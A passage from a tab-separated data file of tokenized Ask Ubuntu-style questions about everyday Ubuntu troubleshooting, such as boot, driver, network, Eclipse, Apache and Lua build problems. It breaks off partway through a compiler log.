486148	cant uninstall 14.04 and reinstall 12.04	i upgraded to 14.04 a few days ago and would like to go back to 12.04 lts for a while longer only thing is that now when i insert my 12.04 startup disc and reboot my computer its not booting the live cd . it just goes to the encypted passphrase login screen ( i encrypted my disk and home folder on installation of 14.04 ) after i put in my passwords i see the cd/dvd drive is in use . i even clicked on the wubi.exe file and asked for help booting from cd . it installs something and then asks to reboot . i do that and it just goes back to the login page . what can i do ?
486150	evince : error while loading shared libraries : permission denied	while opening a pdf , i get a permission denied error , while root . root @ brix : ~ # evince *.pdf evince : error while loading shared libraries : libz.so.1 : failed to map segment from shared object : permission denied this started happening after : mv /usr/local /opt/local ln -s /opt/local /usr/local ( i did this so i could rsync a single /opt/ folder as a backup ) note : i had a compiled libz.so.1 located in /usr/local/lib ( along with libpoppler and friends ) , i do n't think this would be an issue otherwise
486151	can ping but can not ssh to openstack vm instance	have a multi-node maas-juju-openstack setup , i.e. , nova-cloud-controller , nova-compute , and quantum/neutron gateway are on separate hosts . in this setup , maas and openstack share 10.0.0.0/24 as their management network , while quantum charm is connected via eth0 to public network 10.0.10.0 . i am able to spawn instances , and assign floating ip addresses to them . i can also ping to and from public network . furthermore , the 2 cirros instances , which are on the same subnet , can ssh each other . however , am not able to ssh to instances either through router namespace , i.e. , ip netns exec qr-xxxx ssh -i < full path to key > cirros @ privateipaddr , or from outside . i 've generated key-pairs both through dashboard and nova , with similar results . also tried chmod 0600 key , ssh-add key to no avail . a sample output is shown here http : //pastebin.ubuntu.com/7676660/ , which eventually times out . connecting via vnc to cirros image shows , under /var/log messages , the following : jun20 14:29:21 cir3 authpriv.info dropbear [ 364 ] : child connection from gatewayprivateip:32818 jun20 14:29:21 cir3 authpriv.info dropbear [ 364 ] : exit before auth : timeout before auth similar logs are observed , when ssh-ing from public network . in case of public network access , wireshark shows repeated retransmission of ssh ack from source to vm 's public address , with arp calls asking who owns either the source or vm 's ip address , and finally , vm sending [ fin , ack ] and closing the connection . i have set up the meta-data server and followed the 2nd method as noted in cloud instances in openstack ca n't import public ssh key , and am seeing the following during boot up , http : //pastebin.ubuntu.com/7676789/ . ( not sure if these are significant : failed to get http : //169.254.169.254/2009-04-04/user-data warning : no ec2 metadata for user-data ) to isolate testing , i 've created a new security group that allows all tcp ranges in both ingress and egress directions . seems to me that this is not a firewall or policy issue as connection to port 22 is possible , i am wondering if wrong meta-data is being generated during boot up . any and all suggestions are appreciated . cheers ,
486153	backing up system on a partition	i am willing to perform a clean installation of ubuntu on my hard drive . i was looking for efficient ways to backup settings and applications . there is one thing in common between all the solutions i have seen which is the following : '' you can backup your system and personal files using an unused partition and perform the ubuntu installation on another partition . but try to avoid this because it is too risky . '' can someone please explain to me why is it that risky and unsafe ? thank you all for your time , regards .
486159	is there any way to completely remove the launcher , not just hide it ?	i would rather that the launcher did not appear whatsoever , even when i open dash . is it possible to remove it , without removing unity ? hiding it works , but i do n't like it being there with the dash , and apps shaking when i open them from docky .
486160	how to reverse the color of [ hp ] touchpad button/indicator led	i have ubuntu 14.04 running on a compaq cq60 laptop . the laptop has a button just above the touchpad which allows the touchpad to be enabled and disabled . there is a led under this button , which ( when the laptop ran windows ) used to be white when the touchpad was enabled and orange when the touchpad was disabled . since switching to ubuntu , the orders are reversed making enabled orange and disabled white . according to the acpi_listen command , the button is not an acpi button . how would i reverse the led colors back to a logical order ?
486161	street view goes to black in google maps	my street view in google maps stopped working in a recent update . it starts ok , and i can rotate the view , but when i move to another location i only get a black screen , and need to reenter googlemaps from the front page to get normal view again
486162	could not find or load main class org.apache.pig.main	hope someone might be able to help me with this problem ( it 's had me stumped most of the evening ... ) i 'm trying run the following : jon @ ubuntu : ~ $ java -xmx512m -cp pig-0.12.1.jar org.apache.pig.main -x local wordcount.pig ... which is throwing the following error : could not find or load main class org.apache.pig.main i guess i 'm missing something fundamental ... i 've checked the class and it 's in the specified folder . am i right in thinking i 'm at the wrong directory level ? the .jar is located at : jon/home/pig/pig-0-12.1.jar if so , how do i get myself to the right directory level to run the command ? greatly appreciate any advice , r , jon unfortunately i 'm still running into problems . i 've applied the file path to the .jar file , but it 's now throwing the following error : jon @ ubuntu : ~ $ java -xmx512m -cp /home/jon/pig/pig-0.12.1.jar org.apache.pig.main -x local wordcount.pig 2014-06-21 01:30:53,944 [ main ] info org.apache.pig.main - apache pig version 0.12.1 ( r1585011 ) compiled apr 05 2014 , 01:41:34 2014-06-21 01:30:53,945 [ main ] info org.apache.pig.main - logging error messages to : /home/jon/pig_1403339453939.log 2014-06-21 01:30:55,492 [ main ] info org.apache.pig.impl.util.utils - default bootup file /home/jon/.pigbootup not found 2014-06-21 01:30:55,641 [ main ] info org.apache.pig.backend.hadoop.executionengine.hexecutionengine - connecting to hadoop file system at : file : /// 2014-06-21 01:30:55,772 [ main ] error org.apache.pig.tools.grunt.grunt - error 1000 : error during parsing . encountered `` `` a=load `` '' at line 1 , column 1 . was expecting one of : `` cat '' ... `` clear '' ... `` fs '' ... `` sh '' ... `` cd '' ... `` cp '' ... `` copyfromlocal '' ... `` copytolocal '' ... `` dump '' ... `` \d '' ... `` describe '' ... `` \de '' ... `` aliases '' ... `` explain '' ... `` \e '' ... `` help '' ... `` history '' ... `` kill '' ... `` ls '' ... `` mv '' ... `` mkdir '' ... `` pwd '' ... `` quit '' ... `` \q '' ... `` register '' ... `` rm '' ... `` rmf '' ... `` set '' ... `` illustrate '' ... `` \i '' ... `` run '' ... `` exec '' ... `` scriptdone '' ... `` '' ... `` '' ... ... `` ; '' ...
486167	unable to run eclipse indigo on ubuntu ( 3.2.0-64-generic-pae )	i loaded jre7 and jdk7 . i then installed eclipse . sudo apt-get install eclipse eclipse-jdt when i try to open it , eclipse crashes and log file is created . eclipse.buildid=i20110613-1736 java.version=1.7.0_60 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86 ! entry org.eclipse.osgi 4 0 2014-06-20 17:52:18.171 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/piyush/.swt/lib/linux/x86/libswt-gtk-3740.so ca n't load library : /home/piyush/.swt/lib/linux/x86/libswt-gtk.so how can i resolve this ? sorry ! i noticed after posting this question that my ubuntu was 32 bit and i had downloaded 64bit eclipse .
486168	is there a dash like feature in lubuntu , so i can easily search everything ?	is there a dash like program in lubuntu that can be launched either by single or double super tap . i would want to search , and be able to see a lit of all my apps , preferably in icon form , like the dash . however , i would be happy if it did n't have all the features of the dash , and was more like the osx launchpad , which is simply an application launcher . whenever i switch to my lubuntu machine , i miss the ease of access to all my programs . if there is not , what is the key to open the `` start '' menu ?
486169	cpu temperature indicator alternative to jupiter	i was happily using jupiter and now it is not supported anymore . i am on 64bit ubuntu 12.04 using gnome-panel . i am just looking for an applet that will give my my cpu temperature .
486170	upgrade from tex live from 2013 to 2014 on ubuntu 14.04	according to the tex live website tex live 2014 was released one week ago ( 14 june 2014 ) . how do i upgrade from tex live 2013 to tex live 2014 on ubuntu 14.04 ?
486173	how may i deactivate the touchpad ?	the button under settings unfortunately will be reverted as soon as i reboot . why is there no button to disable the touchpad permamently ?
486175	is there a browser based apt-offline / keryx alternative	i have a unique problem that has been plaguing me for a looong time . i work for the government , i have a windows computer at work that has internet access but it is very locked down . i also have a development computer at work that runs ubuntu 12.04 which i use for robot related software development and do anything i want to it . of course i ca n't connect the ubuntu computer to the internet at work ( that would be too easy ) . now , i 'm aware of apt-offline and keryx which allow you to record the package list of your disconnected computer to a signature file , which you can then transfer to a connected computer and use apt-get to get the package of interest along with all the right dependencies . these are great tools but my unique problem is that my windows/connected computer at work does n't allow any programs except internet explore to access the internet . since apt-offline and keryx are portable , i 'm at least able to run them on my windows/connected computer , but they ca n't connect to the internet to download from the repository . any attempts to bypass this block would be a no-no , they take that stuff serious . well you might be thinking `` just take the ubuntu computer or even the signature file home and use the internet there you idiot '' . to make the problem worse , i live in a rural area and only have satellite internet ( hughesnet ) which is very slow , has a very low data cap per day , and makes me want to do a frog splash onto my laptop from the top turnbuckle . currently anytime i want to install something substantial i have to either go to a friends house or steal wifi from a mcdonalds or hotel parking lot . not only does it feel shady , its at least a half hour drive from work or my house to any place like that . does anyone have any ideas ? let me know if you need more information . i 'm imagining/hoping for something similar to apt-offline that creates a text-based signature file that i upload to a website that then allows me to download a zip or tar file that contains the package of interest and all the dependencies . thanks for any help .
486177	multiple connection pycurl ppp0 and ppp1	i have already looked at this question dialing into multiple ppp connections and it 's working well but multiple connections are not available if i 'm adding table ppp0 , the other ppp1 cant connect internet . i want to use the two different ppp connections at the same time . is it possible to have two ppp connections with two different python programs using different connections ?
486178	restoring home folder , firefox launcher problems , can not open display	i had a harddrive crash and so had to reinstall ubuntu ( 14.04 ) . at this point firefox worked fine . then i tar 'd my home folder and replaced it with a version i had backed up from the failed drive . now firefox wo n't launch . i can start firefox from the command line . if i try sudo firefox , however , i get the following error : ( process:7583 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed no protocol specified no protocol specified error : can not open display : :0 if i execute `` xhost + '' , then sudo firefox works , but the launcher button still fails . fyi : echo $ display returns :0 any idea on how to reset the launcher/firefox/user permissions to get this working ?
486179	how can i install ubuntu 14.4 lts from windows 7 using windows installer ?	when i tried to install ubuntu from bootable usb it could n't recognize my installed windows 7 so it showed me like i have to erase my whole drive and then ubuntu can be installed . please help me with this asap .
486180	is there any way to speed up the default plymouth boot animation ?	i have been following a number of different basic tutorials that tell you how to customise plymouth splash screens by modifying the existing scripts and images , which has mostly been successful . using the default ubuntu splash as a template , i now have a rather nice monster-movie themed splash that i call `` kaijubuntu '' ... the issue is that i have incorporated the animation into the theme , but it would look much better if it moved at a higher frame rate . can anyone tell me which part of the script i should modify in order to speed things up ? thanks in advance , gw
486181	removing livewallpaper .	i can not seem to find any resources regarding the removal of livewallpaper , a google search yields nothing on the topic and i have been driven to ask you guys . i have little knowledge of ubuntu or linux in general and i have some extreme anxiety coming here for answers to this mundane question . so be gentle ?
486182	volume control keyboard shortcuts not working in 14.04 ?	i run ubuntu 14.04 on a sony vaio cs series laptop . normally , the volume is controlled by pressing funcion+f2 , f3 , and f4 for mute , volume down , and volume up respectively . i accidentally reassigned the volume up keyboard shortcut to a different key . i tried resetting the keyboard shortcut by going into the keyboard shortcuts editor in ubuntu and pressing function+f4 , but that did n't work . my mute function and my volume down functions both work flawlessly , but volume up does n't work at all . please do n't answer telling me to change the keyboard shortcut in the keyboard shortcuts manager , as i have already tried that . thanks for your help !
486185	why wo n't the ubuntu software center work ?	i 'm running ubuntu 14.04 , and the software center wo n't work . i 've used the steps on http : //www.wikihow.com/install-skype-using-terminal-on-ubuntu , which is great , but ever since i got the package `` getskype-linux-beta-ubuntu-64 '' ( which is a link to the software center ) , the software center would n't quite start . i can click on the icon , but right after the window pops up , it 'll shut down . i 've tried opening the software center in any way i could , but it just wo n't . i 've also tried restarting and shutting down my computer , and i 've tried reinstalling it and a few other commands . does anyone now how to fix this ?
486186	why has nautilus ' `` send to ... '' context menu replaced with `` email ... ''	i have been using ubuntu for quite sometime and i 've always seen the context menu `` send to ... '' where a dialog pops up showing all the places i could send my file to . but , after upgrading to 14.04 , i noticed that the context menu had changed and it now has `` email ... '' in its place . i do n't use that menu much but it is annoying and confusing . if i were to send a file to a contact from empathy , i would n't be `` emailing '' it , i would just be `` sending '' it . ubuntu 14.04 linux aapc-2 3.13.0-30-generic # 54-ubuntu smp mon jun 9 22:45:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux
486189	hotkey fail after suspend	problem the hotkeys are lenovo thinkpad e440 's functions hotkeys ( fn+any f ) . it works normally when pc turned on . it goes to a problem when i do sudo pm-suspend command . after suspended and resumed , hotkeys seem to have no response at all , it is broken . sometime ( rare occasion ) , it 's working . as a note , whenever before suspending i do fnlock ( so , the fn led lights up ) , it is not and can not be turned off afterward . so , it does n't lost its power . trial when the problem comes up , i tried many keys detection software and there 's no response on my hotkeys at all ( to list xev , evtest , xinput , xbindkeys ) . also , i blacklisted thinkpad_acpi kernel module and no problem occured before suspend ( the key still detected ) . i also disable all pm-suspend hooks ( on /usr/lib/pm-utils/sleep.d/ ) . both ways , still , the problem occurred . but , it drift me to a conclusion , thinkpad_acpi and pm-suspend internals not the cause . actually , pm-suspend suspending pc by echoing 'mem ' word into /sys/power/state . and i tried to do that directly . but , the problem persist . hibernation does n't cause this problem ( using /sys/power/state too , or usual pm-hibernate ) . instead , when the keys broken , hibernate heals them up ! it is a long description and led me think this as kernel problem question does anyone know more workaround to try ? or ( for those who knew ) what part of kernel should i looked up ? the second question actually a specific term of the first question .
486192	can not shut down ubuntu 14.04	this is my first time using ubuntu 14.04 version . i 'm not sure what i 've done , but i ca n't shut down my laptop . but if i log in as the guest , then it will shut down if i press the button and i 'm not getting used to terminal . how can i solve the problem ?
486198	running ubuntu on an external hard drive and risk accidentally disconnecting it ?	i am getting a new laptop soon and unfortunately it only has 256gb ssd . i do n't really want to partition it since that would leave me with a meager amount of space . i also want to keep my windows 8.1 . therefore i am considering to either boot ubuntu from an external hard drive or run it through a virtual machine and store the data on the external . which one is safer ? since the external hdd is connected via usb 3.0 , there is a risk of disconnecting the usb cord during runtime and i am afraid this would cause a number of problems such as data corruption . therefore , would a virtual machine be a safer bet ? or are there better options available ?
486200	can we install cdh4 on new ubuntu 14.04	can any one share the steps to follow in installing cdh4 on ubuntu 14.04 version .
486204	i ca n't do hibernate to my pc due to swap partition size is equal zero ?	how can i do that swap partition without losing data when i used ~ $ free -k the output was : total used free shared buffers cached mem : 3891772 3207580 684192 410972 58428 1086932 -/+ buffers/cache : 2062220 1829552 swap : 0 0 0 what should i do for enabling hibernate ? when i used the command sm - hibernate the pc gave ma a dark screen and opend
486206	install 32bit or 64 for older pc	i got a hp/compaq presario c751nr , this laptop is a older computer with 2gb of ram i think it has a 64 bit processor but i believe it came with 32 bit vista , correct me if im wrong . im a tech savy linux newbie ( coming from windows ) . what is a good distro for me , should i get the 32 or 64 bit version .
486210	problem with a bcm4313 on a toshiba laptop	the laptop is a toshiba satellite a660 , running ubuntu 12.04 and it has a wireless interface that doesnât work . so , i went to the cterminal and typed sudo lshw -c network ( as per the instructions in the ubuntu troubleshooting section ) from which i learnt that my wireless interface is a bcm4313 802.11bgn wireless network adapter and that the network is disabled . at the terminal , i then typed nm-tool from which i learn that my networkmanager tool is disconnected . i 'm not sure how to react to this . from looking over the answers to other similar problems , it seems to me that disconnected ' anddisabled ' are elastic terms for `not having the correct drivers for the wireless interface ' . it seems also that i could find and install the correct drivers , but that might not be the end of the matter : the drivers that came with the distribution , whilst inoperative , might still interfere with the correct drivers . i 'd like some advice on how to proceed .
486211	problems with games using wine version 1.5 on ubuntu version 12.04	my problem is that the screen only occupies the corner of the screen . the mouse also seems to be glitchy . i use a wide screen laptop and messing with configure wine helps a tiny bit . the game i am trying to play is called age of empires 2 .
486212	ubuntu 14.04 wifi problems and blinking	i 'm new to ubuntu and i 'm having all sorts of problems , my wifi connection is super slow and intermittent , sometimes it randomly disconnects so i was wondering how do i go about to update the drivers for the adapter ? also , it keeps blinking when transfering data which i find extremely annoying , i have read and tried diferrent solutions about editing the wlan.conf file and adding options iwlwifi led_mode=1 but it does n't work for me , and i 'm guessing it has something to do with the driver , i feel like i 'm missing a line or using a setting for an intels adapter rather than an atheros . i 'm using ubuntu 14.04 64 bits in a hp pavilion dv7-1245dx . *-network description : wireless interface product : ar242x / ar542x wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:09:00.0 logical name : wlan0 version : 01 serial : 00:24:2b:21:93 : d7 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.13.0-29-generic firmware=n/a ip=192.168.2.7 latency=0 link=yes multicast=yes wireless=ieee 802.11bg
486214	record screen at bootup using ffmpeg in 5 minute segments ( 12.04 )	so i 've played around with this quite a bit but at this point i 've managed to hit a wall in figuring the next step . i have this script that works from an ssh tunnel to record display :0.0 # ! /bin/dash # sleep to try not to break everything yay sleep 30 # export the main display export display=0.0 # start an infinite loop while true ; do # set variable now to todays date and the time right now in hours-minutes-seconds_month-day-year now= $ ( date + ' % h- % m- % s_ % m- % d- % y ' ) # start recording using ffmpeg at 5fps with a time limit of 300 seconds ( five minutes ) to file $ now ffmpeg -f x11grab -s 1024x768 -r 5 -t 300 -i :0.0 /home/swuser/videos/ $ now.mp4 done i 've tried it with an upstart job , but it 'll hang startup unless i give it a sleep condition , in which it then does n't record ( i 'm assuming it fails to find display :0.0 even if the sleep is before the export ) and the script continues to run doing nothing but ending ffmpeg over and over . for reference i 'm running ffmpeg 0.10.12-7:0.10.12-1~precise1 any help is greatly appreciated ! !
486216	unable to filter out xscreensaver at ccsm opacity plugin ?	from this answer , i managed to lower the problem concerning `` focus & raise behaviour '' = `` very high '' , by using the `` opacity , brightness and saturation '' plugin setting `` any '' window to 95 % opacity . the problem is , it also matches xscreensaver , and this wont work here : ( any ) & ! ( class=xscreensaver-demo | class=xscreensaver | class=xscreensaver-demo | class=xscreensaver ) so when it activates , i can see my desktop windows thru the xscreensaver ! ! ! what i do now ? i tried to track xscreensaver window class using xprop but `` the window '' ( is it a window ? ) cant be found by xdotool after i get the pid of xscreensaver or its child ( the actual running screensaver ) and try to find its window id as that cant be found ...
486221	ubuntu physical disk vm not working past login screen	i am attempting to set up a vm in virtualbox so i can boot into my ubuntu install on my physical ssd from inside windows . i managed to create the disk , link it to the machine , etc . the problem is that after i get the machine to this point ( the login screen ) : it just stops , and displays this screen for forever after that : i can move the mouse around , but ca n't really do anything else . i 've turned on 3d acceleration , the machine has 128mb video memory ( ca n't turn it up any more ) . i can boot into a cli ( ctrl+alt+f1 ) and do stuff : but i ca n't do anything else .
486226	i am trying to mount a dvd , but it does not work	i type in : mount /dev/sda2 /mnt/dvd but this comes out : mount : you must specify the filesystem type the output of lsblk is : sda 8:0 0 149.1g 0 disk ├─sda1 8:1 0 145.1g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 4g 0 part [ swap ] sr0 11:0 1 2.2g 0 rom
486231	if i change desktop environment will i loose all settings and software i already have . ubuntu to xubuntu	i installed ubuntu 14 ( 64bit ) and later i found that xubuntu is more lighter . i would like to have better performance than visually appealing ui . i work on ruby on rails and i have setup everything on my ubuntu . also have installed many other software in ubuntu . now can i have xubuntu without reformatting my hdd , and loosing my software and settings . if yes then will get any improvement in performance ?
486232	opening firefox on second display at startup	i have attached two monitos : 1 dvi ( primary ) 1 hdmi . i have added this at startup app list to load firefox at bootup : firefox -p tv -url `` http : //mylocaldom.com '' -no-remote this is the output of xrandr -- query screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 32767 x 32767 vga1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected primary 1366x768+0+1 ( normal left inverted right x axis y axis ) 410mm x 230mm 1366x768 59.8*+ 1280x720 60.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 640x480 75.0 72.8 60.0 720x400 70.1 dp2 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) hdmi3 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 698mm x 392mm 1920x1080 50.0 + 60.0* 59.9 30.0 25.0 24.0 30.0 24.0 1920x1080i 60.1 50.0 60.0 1280x1024 60.0 1366x768 59.8 1280x720 60.0 50.0 59.9 1440x576i 50.1 1024x768 60.0 1440x480i 60.1 60.1 800x600 60.3 720x576 50.0 720x480 60.0 59.9 640x480 60.0 59.9 59.9 virtual1 disconnected ( normal left inverted right x axis y axis ) i want to open firefox on the second screen ( hdmi3 ) at bootup . setting display vairbale as 0.1 says diplay 0.1 not found . so , how can i get firefox open on the second monitor at startup ?
486233	ubuntu wo n't load from usb	i 'm trying to install ubuntu 14.04 . i set in my bios for it to load from the usb and once it starts loading this screen pops up and stays there , it wo n't go past this screen .
486234	how to fix `` /tmp is not ready or not present '' after dual boot ?	how can i fix `` /tmp is not ready or not present '' on ubuntu 14.04 ?
486235	ubuntu not starting after running script for brightness	i was trying to fix brightness on ubuntu 14.04 . so i tried what is mentioned here how do i set default display brightness ? i ran the scripts as mentioned on the terminal . sudo apt-get install xbacklight sudo bash -c ' { echo `` # ! /bin/bash '' echo `` xbacklight =30 '' } > /etc/lightdm/display-setup-script.sh ' sudo chmod a+rx /etc/lightdm/display-setup-script.sh if grep ^display-setup-script /etc/lightdm/lightdm.conf ; then echo `` already a display-setup-script . it may already do what you need . else please adjust manually '' ; else sudo bash -c `` echo display-setup-script=/etc/lightdm/display-setup-script.sh > > /etc/lightdm/lightdm.conf '' ; fi after rebooting the system , the grub is working fine , it shows both ubuntu and windows . but after clicking on ubuntu , it just shows a black blank screen . i tried going into recovery mode and updating grub and fixing broken packages , but after that also ubuntu dose n't start . how do i fix this ?
486241	change ownership or permissions of external drive using username and password	there must be an answer to this , but i really could not find it anywhere . i have an external hard drive with data from an older computer , i.e . i have the old username and password , but these do not match user and password from my current box . can i either change the ownership of the older drive to copy the files onto my newer system ? or can i set permissions of the older files using the old user and password ? should i create the old user in my new box ? ( sounds clunky ... ) thank you in advance .
486249	no sound icon on the top unity panel in ubuntu 12.04	i have ubuntu 12.04 and i just logged in and noticed that the sound icon on the top unity panel is missing ! how do i get it back ?
486250	dual boot windows 7 uefi raid with ubuntu 14.04 grub2 problem	i used the intel raid 0 to raid ssd # 1 and # 2 on raid 0 for video editing work , everything was good.i installed windows 7 64bit on an asus x79 deluxe motherboard on these raid 0 two ssds using uefi+gpt , all went good . i then installed 64 bit ubuntu 14.04 lts on a third non raid ssd # 3 with manual partitioning and i got gpt and uefi on that and everything is almost all good . i can browse and see the windows raid windows partition but grub2 does not see list windows uefi . in uefi bios i can select uefi windows boot manager or uefi ubuntu boot manager and each will boot respectively from their own boot manager . however i want to add the uefi windows boot manger to grub2 so i can select the os from grub2 and not have to go into bios to choose os . how can i do this ? i tried boot repair but it seems to screw things up to the point of reinstall . i wonder is there is a way to manually add the windows boot loader to grub2 and daisy chain uefi windows boot manager ? cheers , martin
486252	i can not see my installed programs	i have kubuntu 14.04. when i install program via the software center or via the terminal somehow it does n't appear in my launcher . i can do researching it does n't find it . i know that there is something to update maybe manually for it to appears but at this stage i do n't know what to do .
486257	chromium inspect element causes black screen	i am using chromium version 34.0.1847.116 ubuntu 13.10 ( 260972 ) . when i choose inspect element from chromium , chromium hangs for about 4 seconds and the entire screen ( not just chromium ) goes black . i can not even sleep my pc using power button . using other button combinations like alt + f4 and function keys does not work . i have tried uninstalling and reinstalling chromium , but the problem still persist . also , the addons and history of chromium remains after uninstalling . i do n't whether ubuntu update or any other factor is the reason behind this ? is anyone having the same problem as i do ? also , how the addons and history remained after uninstalling chromium , and how to remove them ?
486259	problem apache server ( re- ) installation	i am newbie in ubuntu and i removed all apache file following command sudo chown user /etc/init.d/apache2 sudo chmod 755 /etc/init.d/apache2 sudo rm /etc/init.d/apache2 i know its wrong way to removing apache , now i want to install apache again edit try to reinstal apache sudo apt-get install -- reinstall apache2 working fine , but when i type command sudo service apache2 start response as , apache2 : unrecognized service
486261	performance issues with amd iommu on	i had a hard time installing ubuntu on my system . the motherboard i 'm using is the gigabyte ga-970a-d3 with amd fx6300 . i tried to install elementaryos , ubuntu 12.04 and ubuntu 14.04 , and for all three of them , when the iommu is turned on in the bios , the setup freezes somewhere along the way and the installation fails . when iommu is off , it wo n't even boot . i 've circumvented this by adding iommu=pt iommu=1 to the end of the line where syslinux defines the boot image . after the installation i have to add the same kernel options to grub . this procedure makes the os usable but i noticed some performance issues . the window animations are not smooth , scrolling in any internet browser is laggy and generally , it feels sub-optimal . has anyone experienced something similar ?
486263	how to install an 'ansi c ' compiler ? ? ? ( how can i extend gcc g++ with ansi c ) ?	to explain the problem ( try two ) : i ca n't install the lua compiler ( lua dot org ) with the newest version of ubuntu , quote out of the manual to install lua : installing lua lua is distributed in source form . you need to build it before using it . building lua should be straightforward because lua is implemented in pure ansi c and compiles unmodified in all known platforms that have an ansi c compiler . [ right this ubuntu does not have , as it seems ... ] lua also compiles unmodified as c++ . [ as it seem nope , the error msg is further below ... ] the instructions given below for building lua are for unix-like platforms . see also instructions for other systems and customization options . if you do n't have the time or the inclination to compile lua yourself , get a binary from luabinaries . try also lua for windows , an easy-to-use distribution of lua that includes many useful libraries . building lua in most unix-like platforms , simply do `` make '' with a suitable target . here are the details . open a terminal window and move to the top-level directory , which is named lua-5.2.3 . the makefile there controls both the build process and the installation process . do `` make '' and see if your platform is listed . the platforms currently supported are : aix ansi bsd freebsd generic linux macosx mingw posix solaris if your platform is listed , just do `` make xxx '' , where xxx is your platform name . [ the make command does not have an ansi c option . ] if your platform is not listed , try the closest one or posix , generic , ansi , in this order . the compilation takes only a few moments and produces three files in the src directory : lua ( the interpreter ) , luac ( the compiler ) , and liblua.a ( the library ) . to check that lua has been built correctly , do `` make test '' after building lua . this will run the interpreter and print its version string . if you 're running linux and get compilation errors , make sure you have installed the readline development package . if you get link errors after that , then try `` make linux mylibs=-ltermcap '' . installing lua once you have built lua , you may want to install it in an official place in your system . in this case , do `` make install '' . the official place and the way to install files are defined in the makefile . you 'll probably need the right permissions to install files . to build and install lua in one step , do `` make xxx install '' , where xxx is your platform name . to install lua locally , do `` make local '' . this will create a directory install with subdirectories bin , include , lib , man , and install lua as listed below . to install lua locally , but in some other directory , do `` make install install_top=xxx '' , where xxx is your chosen directory . bin : lua luac include : lua.h luaconf.h lualib.h lauxlib.h lua.hpp lib : liblua.a man/man1 : lua.1 luac.1 these are the only directories you need for development . if you only want to run lua programs , you only need the files in bin and man . the files in include and lib are needed for embedding lua in c or c++ programs . '' the error msg , quote : awytok @ awytok-athlon-ii : ~/desktop/lua-5.2.3 $ make linux cd src & & make linux make [ 1 ] : entering directory `/home/awytok/desktop/lua-5.2.3/src' make all syscflags= '' -dlua_use_linux '' syslibs= '' -wl , -e -ldl -lreadline '' make [ 2 ] : entering directory `/home/awytok/desktop/lua-5.2.3/src' gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lapi.o lapi.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lcode.o lcode.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lctype.o lctype.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o ldebug.o ldebug.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o ldo.o ldo.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o ldump.o ldump.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lfunc.o lfunc.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lgc.o lgc.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o llex.o llex.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lmem.o lmem.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lobject.o lobject.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lopcodes.o lopcodes.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lparser.o lparser.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lstate.o lstate.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lstring.o lstring.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o ltable.o ltable.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o ltm.o ltm.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lundump.o lundump.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lvm.o lvm.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lzio.o lzio.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lauxlib.o lauxlib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lbaselib.o lbaselib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lbitlib.o lbitlib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lcorolib.o lcorolib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o ldblib.o ldblib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o liolib.o liolib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lmathlib.o lmathlib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o loslib.o loslib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lstrlib.o lstrlib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o ltablib.o ltablib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o loadlib.o loadlib.c gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o linit.o linit.c ar rcu liblua.a lapi.o lcode.o lctype.o ldebug.o ldo.o ldump.o lfunc.o lgc.o llex.o lmem.o lobject.o lopcodes.o lparser.o lstate.o lstring.o ltable.o ltm.o lundump.o lvm.o lzio.o lauxlib.o lbaselib.o lbitlib.o lcorolib.o ldblib.o liolib.o lmathlib.o loslib.o lstrlib.o ltablib.o loadlib.o linit.o ranlib liblua.a gcc -o2 -wall -dlua_compat_all -dlua_use_linux -c -o lua.o lua.c lua.c:67:31 : fatal error : readline/readline.h : no such file or directory # include < readline/readline.h > ^ compilation terminated . make [ 2 ] : *** [ lua.o ] error 1 make [ 2 ] : leaving directory `/home/awytok/desktop/lua-5.2.3/src' make [ 